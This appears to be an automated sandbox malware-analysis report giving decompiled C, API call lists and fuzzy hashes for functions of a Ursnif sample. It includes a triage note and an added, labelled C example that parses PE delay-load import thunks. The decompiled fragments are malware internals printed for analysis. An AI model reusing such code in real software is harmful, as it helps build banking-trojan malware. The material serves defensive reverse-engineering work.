                                                  					_t122 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t11 = _t122 + 0x4f4e8f3; // 0x6f687726
                                                  					wsprintfA(_t146 + _a16, _t11, _t73);
                                                  					_t161 = _t161 + 0xc;
                                                  					HeapFree( *0x4f4d238, 0, _v8);
                                                  				}
                                                  				_t147 =  *0x4f4d32c; // 0x70795b0
                                                  				_t75 = E04F49395(0x4f4d00a, _t147 + 4);
                                                  				_t153 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					HeapFree( *0x4f4d238, _t153, _a16);
                                                  					return _v12;
                                                  				} else {
                                                  					_t78 = RtlAllocateHeap( *0x4f4d238, 0, 0x800);
                                                  					_v8 = _t78;
                                                  					if(_t78 == 0) {
                                                  						L25:
                                                  						HeapFree( *0x4f4d238, _t153, _v20);
                                                  						goto L26;
                                                  					}
                                                  					E04F47A80(GetTickCount());
                                                  					_t82 =  *0x4f4d32c; // 0x70795b0
                                                  					__imp__(_t82 + 0x40);
                                                  					asm("lock xadd [eax], ecx");
                                                  					_t86 =  *0x4f4d32c; // 0x70795b0
                                                  					__imp__(_t86 + 0x40);
                                                  					_t88 =  *0x4f4d32c; // 0x70795b0
                                                  					_t149 = E04F48307(1, _t144, _a16,  *_t88);
                                                  					_v28 = _t149;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t149 == 0) {
                                                  						L24:
                                                  						HeapFree( *0x4f4d238, _t153, _v8);
                                                  						goto L25;
                                                  					}
                                                  					StrTrimA(_t149, 0x4f4c2ac);
                                                  					_push(_t149);
                                                  					_t94 = E04F43CC8();
                                                  					_v16 = _t94;
                                                  					if(_t94 == 0) {
                                                  						L23:
                                                  						HeapFree( *0x4f4d238, _t153, _t149);
                                                  						goto L24;
                                                  					}
                                                  					_t154 = __imp__;
                                                  					 *_t154(_t149, _a4);
                                                  					 *_t154(_v8, _v20);
                                                  					_t155 = __imp__;
                                                  					 *_t155(_v8, _v16);
                                                  					 *_t155(_v8, _t149);
                                                  					_t101 = E04F4809F(0, _v8);
                                                  					_a4 = _t101;
                                                  					if(_t101 == 0) {
                                                  						_v12 = 8;
                                                  						L21:
                                                  						E04F4A1B0();
                                                  						L22:
                                                  						HeapFree( *0x4f4d238, 0, _v16);
                                                  						_t153 = 0;
                                                  						goto L23;
                                                  					}
                                                  					_t105 = E04F443DF(_t134, 0xffffffffffffffff, _t149,  &_v24);
                                                  					_v12 = _t105;
                                                  					if(_t105 == 0) {
                                                  						_t158 = _v24;
                                                  						_v12 = E04F4163F(_t158, _a4, _a8, _a12);
                                                  						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                  						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                  						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                  						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                  						_t119 =  *_t158;
                                                  						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                  						E04F49039(_t158);
                                                  					}
                                                  					if(_v12 != 0x10d2) {
                                                  						L16:
                                                  						if(_v12 == 0) {
                                                  							_t107 = _a8;
                                                  							if(_t107 != 0) {
                                                  								_t150 =  *_t107;
                                                  								_t156 =  *_a12;
                                                  								wcstombs( *_t107,  *_t107,  *_a12);
                                                  								_t110 = E04F485DB(_t150, _t150, _t156 >> 1);
                                                  								_t149 = _v28;
                                                  								 *_a12 = _t110;
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					} else {
                                                  						if(_a8 != 0) {
                                                  							L19:
                                                  							E04F49039(_a4);
                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						_v12 = _v12 & 0x00000000;
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04F48BA8
                                                  • wsprintfA.USER32 ref: 04F48BF8
                                                  • wsprintfA.USER32 ref: 04F48C15
                                                  • wsprintfA.USER32 ref: 04F48C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48C53
                                                  • wsprintfA.USER32 ref: 04F48C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F48CB2
                                                  • GetTickCount.KERNEL32 ref: 04F48CC3
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F48CD7
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F48CF5
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?,070795B0), ref: 04F48332
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(?,?,?,04F4A428,?,070795B0), ref: 04F4833A
                                                    • Part of subcall function 04F48307: strcpy.NTDLL ref: 04F48351
                                                    • Part of subcall function 04F48307: lstrcat.KERNEL32(00000000,?), ref: 04F4835C
                                                    • Part of subcall function 04F48307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F48379
                                                  • StrTrimA.SHLWAPI(00000000,04F4C2AC,?,070795B0), ref: 04F48D2C
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(070787FA,00000000,00000000,74ECC740,04F4A453,00000000), ref: 04F43CD8
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(?), ref: 04F43CE0
                                                    • Part of subcall function 04F43CC8: lstrcpy.KERNEL32(00000000,070787FA), ref: 04F43CF4
                                                    • Part of subcall function 04F43CC8: lstrcat.KERNEL32(00000000,?), ref: 04F43CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04F48D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 04F48D55
                                                  • lstrcat.KERNEL32(?,?), ref: 04F48D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 04F48D69
                                                    • Part of subcall function 04F4809F: lstrlen.KERNEL32(?,00000000,04F4D330,00000001,04F42200,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9), ref: 04F480A8
                                                    • Part of subcall function 04F4809F: mbstowcs.NTDLL ref: 04F480CF
                                                    • Part of subcall function 04F4809F: memset.NTDLL ref: 04F480E1
                                                  • wcstombs.NTDLL ref: 04F48DFC
                                                    • Part of subcall function 04F4163F: SysAllocString.OLEAUT32(?), ref: 04F41680
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 04F48E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F48E49
                                                  • HeapFree.KERNEL32(00000000,?,?,070795B0), ref: 04F48E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48E6D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 4843c8ba76e14edf33dc7dfe3909927fed46e4dccc31d055cccccd3bc53366ee
                                                  • Instruction ID: 41bc7720c9db3e4dbe22e40ad6bc265ddc3242c78dde5f61627cbf3408eefed7
                                                  • Opcode Fuzzy Hash: 4843c8ba76e14edf33dc7dfe3909927fed46e4dccc31d055cccccd3bc53366ee
                                                  • Instruction Fuzzy Hash: E1912979901108AFDB11EFA8EC44AAA7FB9EF88354F144055F904D7250DF39EE52DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                  			E04F4ADE5(long _a4, long _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				LONG* _v28;
                                                  				long _v40;
                                                  				long _v44;
                                                  				long _v48;
                                                  				CHAR* _v52;
                                                  				long _v56;
                                                  				CHAR* _v60;
                                                  				long _v64;
                                                  				signed int* _v68;
                                                  				char _v72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				signed int _t81;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t83;
                                                  				intOrPtr* _t85;
                                                  				intOrPtr* _t90;
                                                  				intOrPtr* _t95;
                                                  				intOrPtr* _t98;
                                                  				void* _t102;
                                                  				intOrPtr* _t104;
                                                  				void* _t115;
                                                  				long _t116;
                                                  				void _t125;
                                                  				void* _t131;
                                                  				signed short _t133;
                                                  				struct HINSTANCE__* _t138;
                                                  				signed int* _t139;
                                                  
                                                  				_t139 = _a4;
                                                  				_v28 = _t139[2] + 0x4f40000;
                                                  				_t115 = _t139[3] + 0x4f40000;
                                                  				_t131 = _t139[4] + 0x4f40000;
                                                  				_v8 = _t139[7];
                                                  				_v60 = _t139[1] + 0x4f40000;
                                                  				_v16 = _t139[5] + 0x4f40000;
                                                  				_v64 = _a8;
                                                  				_v72 = 0x24;
                                                  				_v68 = _t139;
                                                  				_v56 = 0;
                                                  				asm("stosd");
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v40 = 0;
                                                  				if(( *_t139 & 0x00000001) == 0) {
                                                  					_a8 =  &_v72;
                                                  					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                  					return 0;
                                                  				}
                                                  				_t138 =  *_v28;
                                                  				_t76 = _a8 - _t115 >> 2 << 2;
                                                  				_t133 =  *(_t131 + _t76);
                                                  				_a4 = _t76;
                                                  				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                  				_v56 = _t80;
                                                  				_t81 = _t133 + 0x4f40002;
                                                  				if(_t80 == 0) {
                                                  					_t81 = _t133 & 0x0000ffff;
                                                  				}
                                                  				_v52 = _t81;
                                                  				_t82 =  *0x4f4d1a0; // 0x0
                                                  				_t116 = 0;
                                                  				if(_t82 == 0) {
                                                  					L6:
                                                  					if(_t138 != 0) {
                                                  						L18:
                                                  						_t83 =  *0x4f4d1a0; // 0x0
                                                  						_v48 = _t138;
                                                  						if(_t83 != 0) {
                                                  							_t116 =  *_t83(2,  &_v72);
                                                  						}
                                                  						if(_t116 != 0) {
                                                  							L32:
                                                  							 *_a8 = _t116;
                                                  							L33:
                                                  							_t85 =  *0x4f4d1a0; // 0x0
                                                  							if(_t85 != 0) {
                                                  								_v40 = _v40 & 0x00000000;
                                                  								_v48 = _t138;
                                                  								_v44 = _t116;
                                                  								 *_t85(5,  &_v72);
                                                  							}
                                                  							return _t116;
                                                  						} else {
                                                  							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                  								L27:
                                                  								_t116 = GetProcAddress(_t138, _v52);
                                                  								if(_t116 == 0) {
                                                  									_v40 = GetLastError();
                                                  									_t90 =  *0x4f4d19c; // 0x0
                                                  									if(_t90 != 0) {
                                                  										_t116 =  *_t90(4,  &_v72);
                                                  									}
                                                  									if(_t116 == 0) {
                                                  										_a4 =  &_v72;
                                                  										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                  										_t116 = _v44;
                                                  									}
                                                  								}
                                                  								goto L32;
                                                  							} else {
                                                  								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                  								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                  									_t116 =  *(_a4 + _v16);
                                                  									if(_t116 != 0) {
                                                  										goto L32;
                                                  									}
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t98 =  *0x4f4d1a0; // 0x0
                                                  					if(_t98 == 0) {
                                                  						L9:
                                                  						_t138 = LoadLibraryA(_v60);
                                                  						if(_t138 != 0) {
                                                  							L13:
                                                  							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                  								FreeLibrary(_t138);
                                                  							} else {
                                                  								if(_t139[6] != 0) {
                                                  									_t102 = LocalAlloc(0x40, 8);
                                                  									if(_t102 != 0) {
                                                  										 *(_t102 + 4) = _t139;
                                                  										_t125 =  *0x4f4d198; // 0x0
                                                  										 *_t102 = _t125;
                                                  										 *0x4f4d198 = _t102;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_v40 = GetLastError();
                                                  						_t104 =  *0x4f4d19c; // 0x0
                                                  						if(_t104 == 0) {
                                                  							L12:
                                                  							_a8 =  &_v72;
                                                  							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                  							return _v44;
                                                  						}
                                                  						_t138 =  *_t104(3,  &_v72);
                                                  						if(_t138 != 0) {
                                                  							goto L13;
                                                  						}
                                                  						goto L12;
                                                  					}
                                                  					_t138 =  *_t98(1,  &_v72);
                                                  					if(_t138 != 0) {
                                                  						goto L13;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				_t116 =  *_t82(0,  &_v72);
                                                  				if(_t116 != 0) {
                                                  					goto L33;
                                                  				}
                                                  				goto L6;
                                                  			}

                                                  Instruction addresses for the decompiled lines of E04F4ADE5 above, in line order (0x00000000 marks a line with no mapped address):
                                                  0x04f4adf4 0x04f4ae0a 0x04f4ae10 0x04f4ae12 0x04f4ae17 0x04f4ae1d 0x04f4ae22 0x04f4ae25
                                                  0x04f4ae33 0x04f4ae3a 0x04f4ae3d 0x04f4ae40 0x04f4ae41 0x04f4ae44 0x04f4ae47 0x04f4ae4a
                                                  0x04f4ae4f 0x04f4ae5e 0x00000000 0x04f4ae64 0x04f4ae6e 0x04f4ae78 0x04f4ae7d 0x04f4ae7f
                                                  0x04f4ae89 0x04f4ae8c 0x04f4ae8f 0x04f4ae95 0x04f4ae97 0x04f4ae97 0x04f4ae9a 0x04f4ae9d
                                                  0x04f4aea2 0x04f4aea6 0x04f4aeb9 0x04f4aebb 0x04f4af63 0x04f4af63 0x04f4af6a 0x04f4af6d
                                                  0x04f4af77 0x04f4af77 0x04f4af7b 0x04f4aff9 0x04f4affc 0x04f4affe 0x04f4affe 0x04f4b005
                                                  0x04f4b007 0x04f4b011 0x04f4b014 0x04f4b017 0x04f4b017 0x00000000 0x04f4af7d 0x04f4af80
                                                  0x04f4afae 0x04f4afb8 0x04f4afbc 0x04f4afc4 0x04f4afc7 0x04f4afce 0x04f4afd8 0x04f4afd8
                                                  0x04f4afdc 0x04f4afe1 0x04f4aff0 0x04f4aff6 0x04f4aff6 0x04f4afdc 0x00000000 0x04f4af87
                                                  0x04f4af8a 0x04f4af92 0x04f4afa7 0x04f4afac 0x00000000 0x00000000 0x04f4afac 0x00000000
                                                  0x04f4af92 0x04f4af80 0x04f4af7b 0x04f4aec1 0x04f4aec8 0x04f4aed8 0x04f4aee1 0x04f4aee5
                                                  0x04f4af28 0x04f4af34 0x04f4af5d 0x04f4af36 0x04f4af3a 0x04f4af40 0x04f4af48 0x04f4af4a
                                                  0x04f4af4d 0x04f4af53 0x04f4af55 0x04f4af55 0x04f4af48 0x04f4af3a 0x00000000 0x04f4af34
                                                  0x04f4aeed 0x04f4aef0 0x04f4aef7 0x04f4af07 0x04f4af0a 0x04f4af1a 0x00000000 0x04f4af20
                                                  0x04f4af01 0x04f4af05 0x00000000 0x00000000 0x00000000 0x04f4af05 0x04f4aed2 0x04f4aed6
                                                  0x00000000 0x00000000 0x00000000 0x04f4aed6 0x04f4aeaf 0x04f4aeb3 0x00000000 0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F4AE5E
                                                  • LoadLibraryA.KERNEL32(?), ref: 04F4AEDB
                                                  • GetLastError.KERNEL32 ref: 04F4AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04F4AF1A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: c565425d2a030ce61fc175c70c42e5844e9168d404805cf6363787b2ab97c7b6
                                                  • Instruction ID: ce37d9811e606537425a4cd2d8c2c0b9d9ed7b8f195872437d8ddbebbc2f313d
                                                  • Opcode Fuzzy Hash: c565425d2a030ce61fc175c70c42e5844e9168d404805cf6363787b2ab97c7b6
                                                  • Instruction Fuzzy Hash: 75813CB5E40209AFDB14CFA9D880AADBBF5EF98314F158029E915D7340EF74E946CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
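                                                  Triage note on E04F4ADE5: the structure of this routine is the MSVC delay-load helper (__delayLoadHelper2 from the CRT's delayhlp.cpp) statically linked into the sample, not Ursnif's own logic. The tell-tales are all visible in the decompile: _a4 is an ImgDelayDescr (field 1 = DLL name RVA, 2 = module handle, 3 = IAT, 4 = INT, 5 = bound IAT, 6 = unload IAT, 7 = dwTimeStamp, all rebased by 0x4f40000), the `*_t139 & 1` test is the dlattrRva attribute, `_v72 = 0x24` is sizeof(DelayLoadInfo), the globals at 0x4f4d1a0 and 0x4f4d19c are the __pfnDliNotifyHook2 / __pfnDliFailureHook2 slots called with dliStartProcessing (0), dliNotePreLoadLibrary (1), dliNotePreGetProcAddress (2), dliFailLoadLib (3), dliFailGetProc (4) and dliNoteEndProcessing (5), and the three RaiseException codes are VcppException(ERROR_SEVERITY_ERROR, ...) for ERROR_INVALID_PARAMETER (0x57), ERROR_MOD_NOT_FOUND (0x7e) and ERROR_PROC_NOT_FOUND (0x7f). The practical consequence is that LoadLibraryA/GetProcAddress activity from this address range is the runtime resolving a delay-loaded DLL, so an API hook that attributes every dynamic resolution to the malware's own import reconstruction will over-count here.

                                                  The added example below (this is not code from the report or from the analysed sample) replicates the three pieces of logic in that routine on a constructed, flat-mapped mini-image: the IAT slot to INT index computation, the INT thunk decode (by-ordinal vs. by-name with the Hint word skipped), and the PE-signature / TimeDateStamp / ImageBase check that gates use of the bound IAT. `kImage`, `BASE`, the timestamp 0x5f3a0000, the hint 0x0123 and the import name "LoadLibraryA" are all invented for the example; the bounds checks on the RVA and the name are an addition the CRT helper itself does not make.

```c
/* Added example (not code from the sandbox report or from the analysed sample):
 * replicate, on a constructed flat image, the three checks E04F4ADE5 makes when
 * it resolves a delay-loaded import. BASE, kImage, the timestamp 0x5f3a0000, the
 * hint 0x0123 and the name "LoadLibraryA" are all made up for this example. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_ORDINAL_FLAG32 0x80000000u
#define BASE 0x04f40000u   /* hypothetical load address; the dump is rebased to 0x04f40000 */

/* Constructed mini-image: DOS header with e_lfanew, a minimal IMAGE_NT_HEADERS32
 * and one IMAGE_IMPORT_BY_NAME entry at RVA 0x78. RVAs equal file offsets here. */
static const uint8_t kImage[0x88] = {
    [0x3c] = 0x40, 0x00, 0x00, 0x00,            /* e_lfanew = 0x40 */
    [0x40] = 'P', 'E', 0, 0,                      /* IMAGE_NT_SIGNATURE ("PE\0\0" == 0x4550) */
    [0x48] = 0x00, 0x00, 0x3a, 0x5f,              /* IMAGE_FILE_HEADER.TimeDateStamp = 0x5f3a0000 */
    [0x74] = 0x00, 0x00, 0xf4, 0x04,              /* IMAGE_OPTIONAL_HEADER32.ImageBase = 0x04f40000 */
    [0x78] = 0x23, 0x01,                          /* IMAGE_IMPORT_BY_NAME.Hint = 0x0123 */
    'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0,
};

struct resolved {
    int by_ordinal;     /* 1 when IMAGE_ORDINAL_FLAG32 was set in the INT thunk */
    uint16_t ordinal;   /* thunk & 0xffff, valid when by_ordinal */
    uint16_t hint;      /* IMAGE_IMPORT_BY_NAME.Hint, valid when !by_ordinal */
    const char *name;   /* NUL-terminated import name, valid when !by_ordinal */
};

static uint32_t read_le32(const uint8_t *p)
{
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Check 1: the helper indexes the INT and the bound IAT by the byte offset of the
 * faulting IAT slot, rounded down to a 4-byte thunk: ((slot - iat) >> 2) << 2. */
static uint32_t iat_slot_offset(uint32_t slot_va, uint32_t iat_va)
{
    return ((slot_va - iat_va) >> 2) << 2;
}

/* Check 2: decode one 32-bit INT thunk. The sample computes
 * name = thunk + 0x4f40000 + 2 (skipping the Hint word) when the top bit is clear,
 * or ordinal = thunk & 0xffff when it is set. Returns -1 when the RVA or the
 * name would run past the image; the CRT helper itself does not check this. */
static int decode_thunk(const uint8_t *image, size_t size, uint32_t thunk, struct resolved *out)
{
    memset(out, 0, sizeof *out);
    if (thunk & IMAGE_ORDINAL_FLAG32) {
        out->by_ordinal = 1;
        out->ordinal = (uint16_t)(thunk & 0xffff);
        return 0;
    }
    if (thunk > size || size - thunk < 3)          /* need Hint + at least one NUL */
        return -1;
    out->hint = (uint16_t)(image[thunk] | (image[thunk + 1] << 8));
    out->name = (const char *)image + thunk + 2;
    if (memchr(out->name, '\0', size - thunk - 2) == NULL)
        return -1;
    return 0;
}

/* Check 3: before trusting a pre-bound IAT entry the helper verifies that the
 * loaded module has a PE signature, that IMAGE_FILE_HEADER.TimeDateStamp (NT+8)
 * equals the descriptor's dwTimeStamp, and that IMAGE_OPTIONAL_HEADER32.ImageBase
 * (NT+0x34) equals the address the module was actually loaded at. */
static int bound_iat_usable(const uint8_t *module, size_t size, uint32_t load_base,
                            uint32_t descriptor_timestamp)
{
    if (size < 0x40)
        return 0;
    uint32_t e_lfanew = read_le32(module + 0x3c);
    if (e_lfanew > size || size - e_lfanew < 0x38)
        return 0;
    const uint8_t *nt = module + e_lfanew;
    if (read_le32(nt) != 0x00004550u)
        return 0;
    if (read_le32(nt + 8) != descriptor_timestamp)
        return 0;
    if (read_le32(nt + 0x34) != load_base)
        return 0;
    return 1;
}

int main(void)
{
    struct resolved r;
    if (decode_thunk(kImage, sizeof kImage, 0x78, &r) == 0)
        printf("by name: hint=0x%04x name=%s\n", (unsigned)r.hint, r.name);
    if (decode_thunk(kImage, sizeof kImage, IMAGE_ORDINAL_FLAG32 | 7, &r) == 0)
        printf("by ordinal: #%u\n", (unsigned)r.ordinal);
    printf("bound IAT usable at 0x%08x: %d\n", BASE,
           bound_iat_usable(kImage, sizeof kImage, BASE, 0x5f3a0000u));
    printf("bound IAT usable if relocated: %d\n",
           bound_iat_usable(kImage, sizeof kImage, BASE + 0x10000, 0x5f3a0000u));
    printf("slot offset: %u\n", iat_slot_offset(0x04f4d23a, 0x04f4d230));
    return 0;
}
```

                                                  The relocated case is the one worth remembering when reading dumps like this one: the module in memory is rebased (here to 0x04f40000), so the ImageBase comparison fails, the bound IAT is ignored, and the helper falls through to GetProcAddress, which is why the API list for this routine shows LoadLibraryA and GetLastError even though the import was bound at link time.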

                                                  C-Code - Quality: 27%
                                                  			E04F4816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				long _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				void* __esi;
                                                  				long _t43;
                                                  				intOrPtr _t44;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				intOrPtr _t66;
                                                  				void* _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t75;
                                                  				void* _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t91;
                                                  
                                                  				_t79 =  *0x4f4d33c; // 0x7079bc8
                                                  				_v24 = 8;
                                                  				_t43 = GetTickCount();
                                                  				_push(5);
                                                  				_t74 = 0xa;
                                                  				_v16 = _t43;
                                                  				_t44 = E04F470F5(_t74,  &_v16);
                                                  				_v8 = _t44;
                                                  				if(_t44 == 0) {
                                                  					_v8 = 0x4f4c1ac;
                                                  				}
                                                  				_t46 = E04F48022(_t79);
                                                  				_v12 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t80 = __imp__;
                                                  					_t48 =  *_t80(_v8, _t71);
                                                  					_t49 =  *_t80(_v12);
                                                  					_t50 =  *_t80(_a4);
                                                  					_t54 = E04F42049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                  					_v20 = _t54;
                                                  					if(_t54 != 0) {
                                                  						_t75 =  *0x4f4d27c; // 0x212a5a8
                                                  						_t16 = _t75 + 0x4f4eb28; // 0x530025
                                                  						 *0x4f4d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                  						_push(4);
                                                  						_t77 = 5;
                                                  						_t57 = E04F470F5(_t77,  &_v16);
                                                  						_v8 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_v8 = 0x4f4c1b0;
                                                  						}
                                                  						_t58 =  *_t80(_v8);
                                                  						_t59 =  *_t80(_v12);
                                                  						_t60 =  *_t80(_a4);
                                                  						_t91 = E04F42049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                  						if(_t91 == 0) {
                                                  							E04F49039(_v20);
                                                  						} else {
                                                  							_t66 =  *0x4f4d27c; // 0x212a5a8
                                                  							_t31 = _t66 + 0x4f4ec48; // 0x73006d
                                                  							 *0x4f4d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                  							 *_a16 = _v20;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_a20 = _t91;
                                                  						}
                                                  					}
                                                  					E04F49039(_v12);
                                                  				}
                                                  				return _v24;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04F48181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 04F481C1
                                                  • lstrlen.KERNEL32(00000000), ref: 04F481CA
                                                  • lstrlen.KERNEL32(00000000), ref: 04F481D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 04F481DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 04F4823E
                                                  • lstrlen.KERNEL32(?), ref: 04F48247
                                                  • lstrlen.KERNEL32(?), ref: 04F4824E
                                                  • lstrlenW.KERNEL32(?), ref: 04F48255
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: 004898b14485ecba77db5163a3b71a75b02144fa8fd18468974720369e350426
                                                  • Instruction ID: 5978ac865aa1bc593cb948bed6cd636208bf49c510743b47409496d5896ad009
                                                  • Opcode Fuzzy Hash: 004898b14485ecba77db5163a3b71a75b02144fa8fd18468974720369e350426
                                                  • Instruction Fuzzy Hash: 56415D76D00119EFDF11AFA8DC04A9EBFB5EF88348F054051ED04A7211DB35AB12EB90
Uniqueness
• Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E04F4205E(void* __eax, void* __ecx) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				long _v32;
                                                  				void _v104;
                                                  				char _v108;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				void* _t58;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t71;
                                                  
                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                  				_t69 =  *_t1;
                                                  				_t36 = E04F4692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                  				_v8 = _t36;
                                                  				if(_t36 != 0) {
                                                  					L12:
                                                  					return _v8;
